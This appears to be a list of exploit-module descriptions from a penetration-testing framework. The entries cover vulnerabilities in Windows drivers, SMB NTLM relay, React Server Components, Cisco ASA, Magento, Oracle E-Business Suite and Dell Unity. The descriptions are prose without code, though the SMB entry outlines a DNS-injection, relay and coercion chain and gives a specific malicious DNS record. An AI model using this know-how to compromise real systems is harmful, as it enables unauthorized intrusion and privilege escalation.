The vulnerability exists within the GetCookie() endpoint due to unsafe deserialization of AuthorizationCookie objects. The application insecurely decrypts cookie data using AES-128-CBC and subsequently deserialize it via BinaryFormatter without sufficient type validation.
This module uses an insecure deserialization vulnerability in React Server Components to deploy an agent. The module will first check if the target is vulnerable by using the given endpoint with a generic payload. If the target is vulnerable, an OSCI agent will be deployed and the vulnerability will be used again, with a payload that will deploy an in-memory webshell. This webshell can be used later by the OSCI agent to execute OS commands or deploy a network agent. The deployed agent will run with the same privileges of the webapp.
This module exploits an access control issue in Windows SMB clients to deploy a remote agent with SYSTEM privileges through a multi-stage attack chain: 1. DNS Injection: Adds a malicious DNS record 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' via LDAP to the domain controller, pointing to the attacker's IP address 2. NTLM Relay: Starts an ntlmrelayx server that waits for SMB authentication attempts and relays them to install an agent with SYSTEM privileges on the target system. 3. RPC Coercion: Forces the victim system to authenticate to the attacker-controlled DNS name using coercion techniques.
The Cloud Files Mini Filter Driver (cldflt.sys) present in Microsoft Windows is vulnerable to a Time-of-check Time-of-use (TOCTOU) Race Condition, which can result in arbitrary file write. This module allows a local unprivileged user to execute arbitrary code with SYSTEM privileges.
Cisco Secure ASA contains an improper validation of user-supplied input in HTTP(S) requests that allows an unauthenticated remote attacker to access restricted URL endpoints that are related to remote access VPN. Combined with a buffer overflow in the files_action.lua LUA script, these vulnerabilities may allow unauthenticated remote attackers to execute arbitrary code as root or cause unpatched devices to unexpectedly reload, leading to denial of service (DoS) conditions.
An elevation of privilege vulnerability exists due to the Agere Windows Modem kernel module allowing untrusted pointer dereference. The vulnerability could allow an attacker to run code with elevated privileges.
An improper input validation vulnerability in Magento Open Source and Adobe Commerce allows unauthenticated remote attackers with network access via HTTP to achieve session takeover and unauthenticated remote code execution under certain conditions.
The Common Log File System Driver (clfs.sys) present in Microsoft Windows is vulnerable to a memory corruption vulnerability. This module allows a local unprivileged user to execute arbitrary code with SYSTEM privileges.
Vulnerability in the Oracle Concurrent Processing product of Oracle E-Business Suite (component: BI Publisher Integration) allows unauthenticated attacker with network access via HTTP to compromise Oracle Concurrent Processing.
Dell Unity contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to arbitrary command execution.